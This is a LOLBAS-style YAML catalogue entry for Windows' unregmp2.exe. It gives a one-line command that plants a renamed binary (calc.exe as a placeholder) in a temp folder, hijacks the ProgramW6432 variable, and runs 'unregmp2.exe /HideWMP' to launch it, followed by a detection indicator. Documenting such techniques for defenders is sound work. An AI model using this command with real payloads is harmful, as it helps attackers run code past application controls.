--- Name: Unregmp2.exe Description: Microsoft Windows Media Player Setup Utility Author: 'Wade Hickey' Created: 2021-12-06 Commands: - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" Description: Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\wmpnscfg.exe'. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe Detection: - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP` Resources: - Link: https://twitter.com/notwhickey/status/1466588365336293385 Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---